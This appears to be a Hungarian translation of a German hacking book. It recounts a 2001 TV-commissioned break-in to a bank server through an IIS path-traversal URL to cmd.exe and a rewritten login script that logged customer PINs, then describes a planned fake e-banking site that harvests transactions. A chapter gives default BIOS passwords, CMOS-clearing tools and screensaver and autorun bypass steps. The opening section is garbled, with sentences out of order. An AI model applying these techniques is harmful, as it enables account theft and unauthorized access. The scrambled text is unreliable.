mivel a bank scriptjei nem hajtanak végre bináris fájlokat. Ez azonban meghiúsult azon. ha a CMD. hogy a metakaraktereket idézőjelekbe csomagolva a szintakszisnak megfelelően írták (az ASP-scripthez). viszont bináris adatokat és metakaraktereket. Ebben a könyvtárban volt egy alkönyvtár. majd egy hiperhivat-kozáson keresztül lehetett letölteni. például a CMD. hogy a bejelentkező adatok a felhasználói űrlapról közvetlenül egy logfájlba vándoroljanak. és ezzel felhasználhatók más alkalmazások számára is. Az utolsó és legnagyobb dobás az volt.EXE-t. és a sorok „komplex" módon épülnek fel. mint pl. Figyelembe kellett venni. Ebben a könyvtárban volt azoknak a fájloknak a nagy része. Ezeket az adatokat aztán egy Session Cookie-ban (kódolt. hogy az első lépés már el volt intézve. ami azután kényelmes olvasási és írási elérést kínálna. és ezért a legrosszabb esetben háromszor olyan nagy lehetett volna. mivel a sornak URL kódoltnak kellett lennie. Hogy ezt a fájlt le lehessen tölteni. Az adatok. át lehetett írni a bejelentkező-scriptet úgy. Az IIS „sípolta" a konzolfájlok kiadását. ahhoz először a webkönyvtárba kellett másolni. A cookie-t mint HTTP_COOKIE-t tárolták. amelyeket az online banki szolgáltatás használ.EXE-t a /c paraméterrel (egyedüli parancs) futtatták. Az ASP-scriptet. illetve nincs szükségük ilyenekre. A támadási tervről Bináris fájlokat ASP-scripttel írnak. meg lehet írni a CMD. az SSL miatt) tárolja a rendszer. A sorokat tehát cookie-ként küldték el. amelyeknek a webszerver a környezete. Azonosítás és kapcsolat A weboldalakhoz vezető útvonal így nézett ki: C:\Inetpub\Root\Bank. Tehát engedélyezett kapcsolatból kellett olvasni és írni. majd törölték. 1. mint például a HTTP_AGENT vagy a Remote-IP minden kérdésnél. Végül a fájlt törölni kellett.ini könyvtárban tárolják a bank ügyfeleinek folyószámlaszámát. és a kívánt bankot (a •••-t vagy a •••-t).. illetve töltenek fel.> nem lehetett írni. Alapvetően az echo DOS-paranccsal lehet fájlokba írni. Az olvasási elérés nem volt probléma: az olvasandó fájlokat a webkönyvtárba másolták. amelybe csak egy kódolt kapcsolattal lehet bejutni.: <. letöltötték. Tiltott kimenő kapcsolatok Az első terv az volt. és ezután az echo+%HTTP_COOKIE% -val egyszerűen lehetett írni. ami végrehajtáshoz vezet. A szerver támadhatóságának tesztelése A webszerver egy fatálisán szabványos exploitra volt érzékeny: http://www. Megjegyzés: az adminisztrátor ezt a könyvtárat könyörtelelnül törölhette volna. A bökkenő az írás volt. PIN-jét és IP-jét. Az ügyfeleket felkérik. környezeti változóként tárolódnak.7 Az adatletöltés A megváltoztatott scriptek a C:\Temp\ 000043FA..%c255winnt/system32/cmd.EXE-vel.böngészőből. l . hogy gépeljék be 6. Mivel azonban az ASP-hez és a HTML-hez is metakarakterek szükségesek. ezért egyfajta shellt kaptak a böngészőn keresztül.vagy 10-jegyű online számukat. hogy tiltva voltak a kimenő kapcsolatok.3. és ezért itt már nem kellett foglalkozni vele! . hogy egyszerűen féltőkének egy trójait. PIN kódjukat..exe Itt egy hibáról volt szó egy átadott parancs dekódolásánál és legitimációjánál. Amint a feltöltő-script a szerveren volt..de/scripts/. a sok nem alfanumerikus karakter miatt. A szövegkarakterekkel nem is volt gond. ezeket nem lehetett a böngészőn keresztül bevinni. amely szövegkarakterekből áll. hogy ez a folyamat ne legyen olyan könnyen felfedezhető.

1. hogy Ideiglenes Intézkedést adjanak ki.04-én elérte. Az NDR bizonyítékként csak egy másolatot tartott meg. hogy minden adatot vissza kell szolgáltatni nekik.31-ig folyt. pineket.08. 1. Egy folyószámla képernyője Egy részvény-portfólió képernyője S még arra is nyílt lehetőség. Az adatokat végül az NDR jogi osztályának adták át. amelyet egy semleges közjegyzőnek adtak át Hamburgban.04-től 2001.dat képernyője A logfájlokból kapott adatokkal most már be lehetett jelentkezni az ügyfelek folyószámlájára.A Bank. hogy egy pillantást vessenek az ügyfelek részvényletétjére. Ebben az időben több mint 1. A •• bank a Hamburgi Területi Bíróságon 2001.4 Utóirat a bank-hackeléshez A logfájlok áthúzása 2001. amelyben úgy ítéltek. IP-címeket) mentettek le. 08.5 Összefoglalás Az említett eseményeket követően a könyv szerzője elbeszélgetett az ismert német biztonsági . ahol bezárták egy széfbe ezeket.5 millió adatot (online számokat.10. és ott egy széfbe zárták.

Ruef pontosan ismeri a gondot. a Technikai Tanácsadó nevű tv-show. Szerintem a bökkenő a kiértékelésnél van. A megfelelő szoftver és hardver a naplózáshoz és a biztonsághoz (pl. Ebben az összefüggésben újra és újra előkerült a biztonság kérdése. de most a kamera mögött dolgozik. az e~banking. Cornelia Klaila. aki amúgy jól ismert személyiség Németországban. ahová csak az ügyfelek léphetnek be megfelelő azonosítást követően (WWW/SSL/SHTTP/ jelszóvédelem). hogy van egy nyilvános rész. A következőket mondta: „Sok bank webes fellépése megosztott. Az e-banking területet védeni kell. Az információk neveket. Ezzel azt akarom mondani. Leptihn szerint. a bank szóvivője szerint jogi lépéseket tervez egy népszerű fogyasztói high-tech tv-show ellen. én 30 éve csinálok törvénytelen dolgokat. „A (bankszámla) információkkal. íme két érdekes vélemény. amelyet mindenki elérhet (WWW/HTTP). a bankok biztonsági problematikájáról. ami gyakran így is történik (nem viszik túlzásba a biztonsági mechanizmusokat és irányvonalakat). Leptihn. Nagyon törvénytelen. . a Technikai Tanácsadó (Ratgeber Technik) hírszerkesztő csoportjának hamburgi vezetője azt nyilatkozta a Newsbytes-nak. aki 27 éve a Technical Adviser frontembere. de mostanáig soha nem vesztettem el egyetlen ügyet sem. biztonsági megbízottak vagy auditorok nem tudnak mit kezdeni a biztonsági rendszer logfájljaival.kezekben van. Azután van egy félig nyilványos terület. amely hackereket szerződtetett. amelyek fontosak a biztonságos online banki szolgáltatáshoz. amelyek kitűnő kompetenciával tűnnek ki. Ösz-szességében azt kell. mivel néhány nagy bank biztonsági tanácsadója. hogy nem aggódik a ••• perindítása miatt. ha az „a köz érdekét szolgálja". és információkat töltsenek le az ügyfelek számláiról. PIN-számokat és internetes IP-számokat tartalmaztak. biztosított rendszer. a nyilvánosság informálása a ••• számítógépének hiányosságairól nagyon is a köz érdekében történt. Marc Riief-fel. és ez meg is történik (a legújabb patchek." 1. Voltak pereim ezelőtt is. számlaszámokat.." Azt mondta. hogy feltörjék a bank online banking szerverét. A sztorit vasárnap este közvetítették..com tudósításai Német tv-s hackerek bankszervert törtek fel per van kilátásban Ned Stafford. Láttam már olyan banki számítógépeket. akikre utalt. 4:51 ••••. mivel nincs meg a szükséges háttértudásuk. Az „ők". az törvénytelen. millió és millió euró birtokában" mondta. hogy betörjenek a ••• online banki szerverébe. A nyilvános részt elhanyagolhatják. És persze vannak olyan intézmények is. megfelelő biztonsági intézkedések).washingtonpost. Németország egyik legnagyobb bankja. A www. NÉMETORSZÁG 2001. hogy a legszívesebben abban a minutumban mondtam volna fel a folyószámlámat. Az erre hivatott rendszeradminisztrátorok.com és a www. hogy az ARD jogi részlege szerint az ilyesfajta oknyo-mozó újságírást megengedi a német jog. így ékelődött: „Tudják. hogy mondjam: vannak ilyenek és olyanok is.6 Sajtóbeszámolók A bank-hackelés világszerte nagy visszhangot keltett. a ••• müncheni szóvivője. most akárhol is lehetnénk a világban. Nem szabad valamennyit egy kalap alá venni. ezt nyilatkozta a Newsbytes-nak: „Amit tettek. szept.newsbytes.szakértővel. du. 17.de sajnos nem nagyon jó . Számtalan újság és rádióállomás számolt be az akcióról. Newsbytes MÜNCHEN. erős irányvonalak.. Bernd Leptihn. amelyeknek a birtokába jutottunk. A Technikai Tanácsadó augusztusban felfogadott néhány fiatalembert. Németország két közszolgálati tévéhálózatának egyike gyárt. amelyet az ARD. tűzfal-elemek és Intrusion Detection System) a pénzügyi szektorban aránylag gyakran a rendelkezésre áll (ellentétben más terület hálózati kapcsolattal működő cégeivel). Ezeknek az adminisztrációja is többnyire jó . Mindenesetre bőven van még tennivaló.

1. így a szerkesztőknek és a szakértőknek a műsor adatai szerint lehetővé vált néhány napon belül 1. hogy ő és a csapata részt vettek egy telekonferenciás hívásban a ••• technikai személyzetével. azt mondta: „Nem mondtak csúnya szavakat. Ahogy az ARD a továbbiakban közölte. hogy a weboldalt a szokásos rendszeres karbantartás és nem a biztonsági rések kijavítása miatt állították le. hogy bűntetőjogi és polgári peres kártérítési per is lehetséges a Technikai Tanácsadó ellen." .5 millió online könyvelési akciót megszerezni. hogy a ••• bank ezen a nyáron egy új online weboldalt helyezett üzembe. egy új log-in redszert vezettek be. mit is akarunk tenni. Augusztus hónap folyamán . és „igazán nem volt gond. A zdnet. Klaila azt mondta. 08:46 óra Thüringiai hackerek a Ratgeber: Technik ARD-magazin megbízásából. Weide azt mondta. az online-számokat (TAN) és az IP-címeket. hogyan tudják befoltozni a réseket. Négyük közül az egyik Stephan Weide. szeptember 17. hogy a betörés a ••• számítógépébe csak két-három napot vett igénybe. hogy a ••• banknál bizony van néhány nagy biztonsági rés. a számlákat a kimerítésig terhelhették volna. 2001.t választották.. A fiatal hackerek inkább abban voltak érdekeltek. Azt hiszem. Az adó által felfogadott hackerek azonban ebben az átdolgozott programban is találtak réseket." Weide és Leptihn elmondták. hogy elveszítik az állásukat. „A hackereink ismét próbálkoztak az új site-on. hogy a technikaiak hangot adtak-e haragjuknak a hackelés miatt. más bankoknál is csak félig-meddig .mondta. a bank szóvivője. ami biztonságos.mint mondta mindkét oldal. A régi weboldalt szeptember elején offline-ba helyezték. ezt nyomatékosan kétségbe vonta. de ez „nem volt sok". amelyek értelmetlenné teszik a pénzintézet kódolási eljárását. A Ratgeber szerkesztősége szerint azért a •••. s azt állította. hogy a kutatás megmutatta. 22 évesen a Multimedia Network Systems cég ügyvezetője Leinefeldében. hogy az új oldal az utolsó éjszaka előtt biztonságos lett volna. működő kamera előtt törték fel a ••• biztonsági mechanizmusait. A bank a Microsoft Internet Information Serverét (IIS 4. A tévéadó komputeres szakemberei ismételten óvtak a trójaiktól. és sikerrel jártak" -állította. és hogy ez az oldal state-of-the-art rendszer. Weide azt nyilatkozta a Newsbytes-nak. Mikor megkérdeztük. és a hackerek a régi weboldalra. beleértve titkos kódokat (PIN).7 Tapaszatalatok más bankoknál Nem csak a ••• nincs felvértezve a támadások ellen. Leptihn viszont vitatta.de News tudósítása ARD: Online banki szolgáltatásbeli hiányosságokat lepleztek le PIN-eket és TAN-eket olvastak ki bekapcsolt kamera előtt. A Technikai Tanácsadó megbízott egy négytagú hackercsapatot." Miután a Technikai Tanácsadó vasárnap éjszaka a tévében megszellőztette az ügyet. Azt is jelezte. hogy mennyit fizettek nekik. a hackereknek dispo-kredit adatokat is sikerült elérniük. „Még el kell döntenünk.0) használta. mert ez a bank különösen „lukacsosnak" bizonyult a jogosulatlan hozzáférésekkel szemben. Azt nem árulta el. Klaila. a régi és az új is online-ban voltak. Behatolásuk bizonyítására a betolakodók csupán egy 100 márkás könyvelésre „korlátozták magukat".vélekedett. hogy megmondják nekik. bárki meg tudta volna tenni. és nem az újra törtek be. hogy a ••• online banking oldala vasárnap késő éjjeltől kezdve úgy hat órára leállt. s így. féltek. Még egy laptoppal és egy adatátvitelre alkalmas mobiltelefonnnal is gond nélkül lehet jogosulatlanul pénzt átutalni.Leptihn arra is utalt. De elvileg sok más banknál és takarékpénztárnál is lehetséges lenne egy virtuális betörés. Miután a magazin figyelmeztette a •••-t központi számítógépének a hiányosságaira. hogy publicitást nyerjenek induló internetes biztonsági tanácsadó cégüknek .

Ezt a takarékpénztáraknál gyakran számítóközpontok kezelik. amelyek nagyon támadhatóvá teszik a szervert. Ezen a webszerveren gyakran tisztán reprezentatív célokból futnak olyan alkalmazások. Többnyire egy helyben lévő vagy szolgáltatón keresztül kezelt szerverről van szó.a kleinmusterhauseni takarékpénztár Ennek a tararékpénztárnak olyan az internetes megoldása.7. és amelyen keresztül egy linkkel a folyószámlájához jut. 1. Nyíltszívűen . mint a legtöbbnek Németoszágban: két részből áll. és ki lehet indulni abból. A szerverek többnyire jól védettek. A tapasztalatokból. amelyeket az előző akciókból gyűjtöttek. a következő terv született. amely csak nagyon egyszerűen védett. és a rendszergazda is szívesen elhanyagolja.1 Forgatókönyv a takarékpénztár-területen 2001 októberében a szerző újabb megkeresést kapott valakitől. Bepillantás egy német tararékpénztár jelszó-fájljába. Ez általában egészen egyszerű felépítésű.sikeresek a szerverük védelmére irányuló intézkedések. Van a nyilvános rész. amelyben az ügyfél az illető tararékpénztárról információt szerezhet. hogy egy támadás ez ellen a számítógép ellen semmiféle sikerrel sem járna. A második terület a tulajdonképpeni e-banking. aki a különböző bankok visszásságainak a feltárására tararékpénztárak biztonsági auditjával bízta meg. egy maghatározott URL begépelésével Itt az átmenet a home-bankinghoz .

A támadási terv Először egy biztonsági rést próbáltak keresni. amelyek a számítóközpontban elhelyezett tulajdonképpeni e-banking gépre mutattak. Ez ebben az esetben egy script-hiba vagy egy hibás FTP-szerver lenne. amely lehetővé teszi az illető bank. amelyen többnyire HBCI-eszközök meghajtóit vagy különböző online banking szoftverek frissítéseit tárolják. illetve takarékpénztár nyilvános szerverének az elérését. Isten hozta a tararékpénztárnál -csak az URL-nek kell a megfelelőnek lenni Példa egy tararékpénztári oldal forrásszövegére megfelelő linkeléssel a számítógép-központhoz A hamisítvány veszi át a szerepet A megfelelő oldal külleméről és működési módjáról rendelkezésre álló információk alapján . A betörés után megváltoztattak minden oldalt.

Mivel a tranzakciók egyike sem lesz végrehajtva. Az ügyfél ugyanazokat az információkat és opciókat látja maga előtt. mint a valódi e-banking gépen. Ha most egy átutaláshoz beírja az adatokat. a tranzakciószámok továbbra is érvényben maradnak. ezek az adatok egy logfájlban landolnak. hanem csak a logfájlba vándorol.hozzákezdtek egy hamisítvány felépítéséhez. tehát az ügyfeleket a helyi tararékpénztár prezentációjáról a megváltoztatott Folyószámla vagy Onlinebanking link közvetlenül a hamisítványra vezeti. Ez a hamisítvány a tuljdonképpeni e-banking számítógépet „tükrözné". „A kockázatokról és mellékhatásokról kérdezze banki tanácsadóját!" .

1.3 A távoli elérésű támadás internet.3 Képernyővédő-jelszó . adatbetekintés vagy lopás 2.3. vigyázat! 2.6 Óvintézkedések 2.5 Brute Force-rohamok a megosztási jelszavak ellen 2.3.1 A fájl.2 Mik azok a szkennerek.1 Érdekes jelszavak szinte mindenütt akadnak 2.3 Jelszavak a Windows 2000 alatt 2.1 A hackeren túl . az NT és utódai között 2.1.3.1 Különbségek a Windows 9x.a betörés előkészítése CD-vel 2.2 A jelszófájlok 2.a bennfenteseknek nem okoz problémát 2.Tartalom 2.3.2 A jelszavak kikémlelése 2.2 A fizikai támadás 2.és nyomtatómegosztás .2.1.merevlemez-fejreállás. fejezet .2.3.3.1.4 További támadási technikák .4 Automatikus lejátszás . és hogyan működnek? 2.3 Milyen lehetőségeik vannak a betolakodóknak? 2.2.2.veszélyes biztonsági rések 2.vagy hálózati felhasználók.4 Jelszóval védett megosztások 2.

Ráadásul a felhasználói operációs rendszerek gazdái is nagyon megkönnyítik a támadók dolgát.0 és Windows 2000) tervezésénél sokkal tudatosabban koncentrált erre a témára. azt a későbbiekben megmutatjuk. akinek közvetlen elérése van a rendszerre. Míg a Windows 95/98/ME fejlesztésénél a Microsoft a felhasználóbarátság kedvéért elhanyagolta a biztonságot.2 A fizikai támadás A számítógépek védelmének nem túl gyakori módja a BIOS-jelszó beállítása. az NT és utódai között A különböző operációs rendszerek közötti alapvető különbség. illetve az újbóli előállítása a PC árának többszörösébe kerülne. a professzionális területre készült termékek (Windows NT 4. Mivel az adataink nem csak az internetes szörfözés közben vannak veszélyben. hogy minél öregebb egy számítógép. 2. 2000) gyenge pontjai a számítógép ebédszünetben bekapcsolva marad. vagy a kényelem kedvéért lemondanak a BIOS-jelszóról. illetve feltörni a védelmet. 2. Az egyik a fizikai támadás. NT. Az NT vagy a Windows 2000-es gépeknél ott van még a jelszavas bejelentkezés. hogy ezt a védelmet megkerülve jussanak be a rendszerbe. és vele együtt a BIOS. illetve feltörésének három alapvető módját különböztetjük meg: • általános jelszó használata a jelszó megszerzése a memóriából • a CMOS szoftverének törlése . ami igazán csak most. amely növeli a biztonságot.A Windows-rendszerek (9x.1. de gyakran még a vállalatok is visszariadnak egy jó tűzfal költségeitől. amelyeknek az elvesztése. A magánfelhasználók. mielőtt a grafikus felület megjelenne. amelyet a felhasználónak a számítógép minden indításához be kell írnia. A hackereket egyenesen csalogatják a gyenge pontok.1 A hackeren túl .a legtöbb? . akik a Windows XP Home Editionnel fognak dolgozni) többnyire csak csekély ismeretei vannak a biztonságról. Manapság szinte minden számítógép-használónak vannak olyan adatok a gépén. Alapigazság. például egy lopásét.merevlemez-fejreállás. a hackereknek arra is vannak módszereik. A Windows 95/98/ME-t érő támadásoknak két fajtáját kell megkülönböztetni. A Windows 95/98/ME felhasználóinak (és valószínűleg azok nagy részének is. ha 2. a másik a távoli elérésű támadás. még figyelembe se vettük: ugyan ki szeretné az utolsó adóbevallását vagy bizonyos leveleit rossz kezekben tudni? Az egyedülálló PC-t ugyan inkább a külső hatások (vírusok. amit olyan valaki hajt végre. amelyet az internetről indítanak. ami sok . ami a 9x-nél kiegészítő szoftvertől függ.és még a legfifikásabb BIOS-jelszó sem ér sokat. adatbetekintés vagy lopás A biztonság tulajdonképpen az adatok biztosítási lehetőségeinek az alapvető mérlegelésénél kezdődik.) vagy a hibás kezelés veszélyezteti.1 Különbségek a Windows 9x. és azokról a veszélyekről. Emellett az NT-nél és a Windows 2000-nél az adatokat már eleve zárolni lehet.esetben egyáltalán nem történik meg. Hogy mennyire biztonságosak a jelszóval védett képernyőkímélők. És akkor a további kockázatokat. mint köztes fokozat. Így a felhasználók ezekkel az operációs rendszerekkel a jövőben is könnyű prédái lesznek mindenfajta hackertámadásnak. ami a BlOS-jelszónál kezdődik. lopás stb. ennek ellenére rengeteg más lehetőség is van hozzáférni a személyes adatokhoz: otthon vagy az irodában alapvetően mindenki odaülhet a géphez . A BIOS-jelszavas lezárás megkerülésének. Sajnos. annál könnyebb kikerülni. hogy behatoljanak a rendszerekbe. az XP-vel fog megszűnni: az eddigi Windows 9x vonal csak korlátozott védelmet (BIOS-jelszó) kínál a jogosulatlan felhasználás ellen. ez a fejezet az adatbiztonság egészével foglalkozik. amelyeknek az adataikat kiteszik.1.

hackerzbook. hogy ilyenkor a rendszerbeállítások is elvesznek. Ezeket a jelszavakat számos oldalról be lehet szerezni az interneten. hogy a gép már elindult. a használatuknál azonban figyelni kell az amerikai billentyűzetkiosztásra. Ezeknek a jelszavaknak a többségét sikerrel teszteltük.hackerzbook. mint törölni a BIOS-t. és azzal együtt a jelszót is. ezek közül az egyik legismertebb a KiLLCMOS32.M. arra az esetre. ilyenkor ugyanis segédprogramokkal el lehet érni a memóriában tárolt jelszót. Gyártó: Award BIOSSTAR BIOSTAR ALFAROME q_127&z J64 Password-BlOS-Hacker Oren Levytől Program AMIDECOD Award Modular Bios crack tool CrackAmiBios 1.Dynam ic FalCoN 'N' AleX Forrás www. amelyeket könnyen be lehet szerezni az internetről.Általános jelszó használata A különböző BIOS-verziók gyártói adnak egy általános vagy default jelszót.de www. A KiLLCMOS32 minden BlOS-beállitást megbízhatóan töröl CONDO awkward BIOSTAR A jelszó megszerzése a memóriából A jelszó memóriából történő megszerzése feltételezi. Ezekkel a jelszavakkal a számítógépet az utoljára használt és mentett jelszótól függetlenül lehet elindítani. ha a biztonságáért aggódó felhasználó egyszer el találná felejteni a jelszavát. vagy már teljesen elavultak.hackerzbook.hackerzbook.hackerzbook. AMI?PW AMI?SW AMI_SW AMI Gyártó: Phoenix PHOENIX phoenix CMOS BIOS Altalános jelszavak aLLy Wodj SZYX Syxz Sxyz SKY_FOX setup AMI általános Password (C)alculator AWARD J262 J256 j262 j256 AWARD_SW 589589 AWARD_PW AWARD_PS AWARD?SW AWARD SW AWARD 589721 Általános BlOS-jelszavak Programok a jelszó kiderítéséhez a memóriából SER LKWPETER Ikwpeter HLT A CMOS szoftverének törlése Ha a hacker nem talál általános jelszót vagy megfelelő segédprogramot. de valójában a legtöbbnél kérdéses. Azt persze figyelembe kell vennie. nem marad más hátra.1 Password for AWARD BIOS BIOS Szerző Danny Soft The Immortal Ismeretlen Oren Levy .de www. A BIOS törléséhez megint csak segédprogramokat használnak a „betörők".de www.de AMI Award Gyártó: AMI PASSWORD Ami A.I. A különböző BIOS-verziókhoz különböző programok vannak. hogy vajon még működnek-e. és minden BIOS-verzióhoz használható. Mindenesetre a rendszernek már futnia kell a használatához.de www. Ez a segédprogram minden beállítást töröl. .

A program egy érvénytelen értéket helyez el a CMOS-ban, és ez úgy hat, hogy minden ott tárolt adatot (a jelszót is) újra meg kell adni. A használatának a feltétele azonban az, hogy a számítógép már működik, és szabad a hozzáférés. A http://www.memosys.com/passwort/faq.htm címen további információk találhatók a BIOS-jelszavakról. A jobban informált internet-felhasználók néha azt hiszik, hogy egy rendszert csak az internetről érhetnek támadások, és ez ellen egy tűzfallal jól meg is védik a gépüket. De mi van akkor, ha valaki mondjuk az ebédszünetben fizikailag fér hozzá a számítógéphez? Milyen módszereket fog alkalmazni, hogy kikerülje a képernyővédőt és jelszavakat olvasson ki?

A Windows a jelszó megerősítését kéri

2.1.3 Képernyővédő-jelszóa bennfenteseknek nem okoz problémát
Hogy a számítógépünk rövid távolléteink alatt is védve legyen a kíváncsi szemektől, arról a Windows 95/98/ME alatt a legegyszerűbben képernyővédőjelszóval gondoskodhatunk. Ez a képernyővédő bekapcsolása után csak a megfelelő jelszót megadó felhasználónak engedi meg a rendszer elérését.
Ha a Windows csővezetéket épít vagy Beziergörbéket mutat - csak jelszóval lehetséges a visszatérés

így lehet feltörni a jelszóvédelmet
Az alábbiakban megvilágítjuk, milyen könnyű egy képernyőkímélő jelszavát kikapcsolni, illetve kikerülni, ha a hackernek ehhez elég ideje és tudása van.

Újraindítás
Windows 95/98/ME alatt a Képernyő tulajdonságai ablakban a Képernyőkímélő regiszterlapon a képernyőkímélő bekapcsolása után zárolni lehet a rendszer elérését. Ha mások is hozzáférnek a PC-nkhez, alapvetően be kell állítanunk ezt a jelszót, mert különben könnyen űzhetnek velünk csúnya tréfát: képzeljük el, hogy valaki három perc után induló jelszavas képernyővédőt állít be a gépünkön. Ezután elég egy rövid szünet (telefon vagy hasonló), és máris megakasztotta a munkánkat. Hiszen jelszó híján nem jutunk a PC-hez újraindítás nélkül. Akkor viszont elveszhetnek az adatok, amelyeket esetleg még nem mentettünk el - nagy az ár. Igazán dühödt, primitív, de hatásos módszer a képenyőkímélő-jelszó kikerülésére: a számítógép újraindítása a rését gombbal. Figyelembe kell venni, hogy a nem mentett adatok minden esetben elvesznek, így például a nem mentett Word-dokumentumok vagy a nyitott fájlok stb. Szerencsére ilyenkor a rendszer felhasználója észreveszi a behatolást.

Taskmanager - kapu a betörőnek Windows 95 alatt
Windows 95 alatt a Microsoft még egyszerűbb módot kínál a képernyőkímélő kikerülésére: a Ctrl+Alt+Del billentyűkombináció lenyomásával • mondhatni „majomfogással" - célzottan be lehet zárni a képernyőkímélő program taskját.

Rossz csillagzat alatt született a védelem: egy egérkattintással be lehet zárni a képernyőkímélőt

A Windows 95/98/ME a CD-ROM-meghajtóhoz alapértelmezésként az autoplay (automatikus lejátszás) opciót használja, amelyet a Microsoft Knowledge Base Article Q141059 a következőképpen definiál: „A Windows folyamatosan ellenőrzi a CD-ROM-meghajtót, hogy megállapítsa, helyeztek-e bele CD-ROM-ot. Ha ilyen lemezt fedez fel, ellenőrzi, hogy van-e rajta autorun.inf-fájl. Ha a CD tartalmaz ilyen fájlt, akkor végrehajtja a fájl open= sorába írt parancsokat." Megjegyzés: ezt a témát még a 4.fejezet is tárgyalja, mert az automatikus lejátszás funkciót gyakran használják trójai vírus becsempészésére idegen rendszerekbe. Ehhez lehet a rendszer esetleg futó internetkapcsolatait (vagy hálózatoknál a LAN-kapcsolatokat) használni, és így a PC-hez a képernyőkímélő-jelszó ellenére hozzá lehet férni. Ha a trójai már bent van, a képernyőkímélő-jelszót egészen egyszerűen ki tudja kerülni. Egy ilyen hozzáféréssel a képernyőkímélő-jelszót is ki lehet kapcsolni úgy, hogy: HKEY_CURRENT_USER/Control Panel/desktop/ScreenSaveActive Registrykulcs értékét nullára állítjuk. Van néhány program, amelyeket az automatikus lejátszás funkcióval, a jelszómegadást kikerülendő, fel lehet másolni. Ezeknek a programoknak egyike a Clean Screen. Íme, a használati utasítás, amellyel szükség esetén magunkat is kiszabadíthatjuk (az előkészületeket azonban előre meg kell megtenni, nehogy túl késő legyen): 1. Letölteni (www.hakerzbook.de) és kicsomagolni a ZIP fájlt! 2. Az EXE fájlt és az autostart-ini-t CD-re írni. A két fájlnak a könyvtárfán egészen felül kell lennie, tehát ne valamilyen alkönyvtárba másoljuk. 3. Ha a CD-írás elkészült, akkor egyszerűen próbáljuk ki egyszer a saját PCnken. 4. Képernyőkímélő-jelszó beállítása, majd várakozás, míg a képernyőkímélő elindul. 5. Tegyük az újonnan megírt CD-t a meghajtóba, és várjunk, amíg a PC hangszórója sípolni kezd. Ha nincs bekötve, egyszerűen várjuk ki, míg a CD-ROM-meghajtó leáll. 6. Ezután már csak írjuk be a jelszó lekérdezésére az 123-at, és a képernyőkímélőnek el kell tűnnie!

Védelmi lehetőség Windows 95 felhasználóknak
Ez ellen a támadás ellen csak a Windows 95 Windows 98/ME-re frissítése nyújt védelmet. A képernyőkímélő-jelszó elkerülésének ilyen kísérletei az NT/2000-nél is hatástalanok. A későbbiekből az is ki fog derülni, hogyan is lehet feltörni az ilyen jelszót, mert a jelszavas védelem is csak korlátozott mértékben nyújt biztonságot. A jelszó megfejtése a megfelelő szoftvereszközzel igazán egyszerű, jobb, ha tudjuk, hogy mennyire az. így persze rögtön magunkon is segíthetünk, ha elfelejtettük a saját jelszavunkat.

2.1.4 Automatikus lejátszás a betörés előkészítése CD-vel
A PC-t a BIOS-szal, a képernyőkímélőt jelszóval zároltuk, és talán még a jelszót is úgy választottuk meg, hogy az betűk és számok kombinációjából álljon - most aztán a PC-nk szünetben is bevehetetlen, vagy lehet, hogy mégsem? A következőkből kiderül, hogy milyen eszközöket vethet be ebédszünetben egy potenciális hacker, hogy minden igyekezetünk ellenére hozzáférjen az adatainkhoz.

7. Ezután a program kiírja a régi jelszót, és a Régi érték beállítása paranccsal vissza lehet állni rá. Ha ezt nem tesszük meg, aktuális jelszóként a 123-at tárolja.
A képernyőkímélő-jelszó megszerzése autoplay CD-vel

A képernyőkímélő jelszó kikódolása A képernyőkímélő jelszót a Windows 95/98/ME alapértelmezésként a HKEY\USERS\.Default\Control Panel\Sreen_Save_Data Registry-kulcsban tárolja. A kódolása nagyon egyszerű, és számos programmal feltörhető. A legtöbb programnak az a hátránya, hogy csak akkor működik, ha a képernyőkímélő még nem aktív (hogy mit tehetünk, ha már az, azt már tudjuk).
Jelszófeltörő program működés közben

Védekezés az automatikus indításos támadások ellen Ezeket a támadásokat úgy védhetjük ki, ha a Windows 95/98/ME alatt kikapcsoljuk az automatikus lejátszás funkciót. Ez a következőképpen működik: A Vezérlőpulton kattintsunk duplán a Rendszerre, válasszuk az Eszközkezelő fület, kattintsunk duplán a CD-ROM-ra, és aztán a CD-ROM meghajtófára. A Beállítások regiszterlapon távolítsuk el a pipát az Automatikus lejátszás elől.
Itt találjuk a döntő fontosságú pipácskákat

Néhány program a képernyőkímélő-jelszó feltöréséhez:
Program SCR-it! - 1 .0 verzió SCRNLOCK SS_D 1.0 Win95 Screen Saver Password Cracker v1 . 1 Programok a képernyőkímélő-jelszó feltöréséhez Szerző Yoto Yotov Yoto Yotov Bubble nobody weboldal www.hakerzbook.de www.hakerzbook.de www.hakerzbook.de www.hakerzbook.de

2.2 A jelszavak kikémlelése 2.2.1 Érdekes jelszavak szinte mindenütt akadnak
A helyi támadásoknál nagy szerepe van a jelszavak kikémlelésének. Jelszófeltörők segítségével a hackerek szinte minden, Windows alatt tárolt jelszót meg tudnak szerezni, hogy azután elérjenek velük jelszóval védett fájlokat, az

Egy kb. 10:30 . hogy szeretné-e menteni ezeket.az automatikus kiegészítés A dortmundi államügyészségnél több mint 1000 eljárás van folyamatban gyanúsítottak ellen egész Németországban. az adatokat kiolvasva. 2.internetet vagy a hálózatot. A hackerek a jelszavakat még az idevágó weboldalakon is nyilvánossá tehették . A Windows 95/98/ME alatt minden program eléri a PWL fájlokat. november 5. hogy hozzáférjenek ezekhez az információkhoz. tehát a c:\windows\ alatt. íme egy aktuális példa: 2001. A dortmundi és a münsteri államügyészség két nagy ügyében kerek kétmillió márkára becsüli a károkat. Sajnos. hétfő . hogy valaki. Münsterben már 3600 nyomozási eljárás lezárult. amely a belépési adatok megadása után megkérdezi a felhasználótól. illetve ezek bizonyos területeit. . Praktikus segítség a felhasználóknak és a betörőknek . a telefonos kapcsolat jelszavai és a Windows bejelentkező nevek.. A Windows minden PWL-fájlt a Windows könyvtárban tárol. a PWL fájl nevejani.silicon. Példa: ha a Windowsba Jani néven jelentkezünk be. Erre egyszerű példák találhatók az Internet Explorernél és a telefonos kapcsolatnál. Különösen veszélyes ez a telefonos kapcsolatnál. Ezek az ügyek azonban az államügyész adatai szerint már egy fél évvel ezelőttiek. A PWL a PassWord Library rövidítése. akik mit sem sejtő PC-tulajdonosok költségére szörföztek az interneten. Minden felhasználói profil tartalmaz egy saját PWL fájt.de Internetezzünk olcsón sokkal több nem is kell hozzá Az így tárolt információkat egy jelszófeltörő segítségével nagyon könnyű kiolvasni. Az Internet Explorer a 4. hogy adatokat tudjon elhelyezni bennük. a felhasználóknak pedig egyre nehezebbé teszi a jelszavak elrejtését.. verziótól kezdve egy automatikus kiegészítést használ. Jelszavak ezreit törték fel de. mert akár odáig vezethet.pwl lesz. a fájlnév pedig a mindenkori 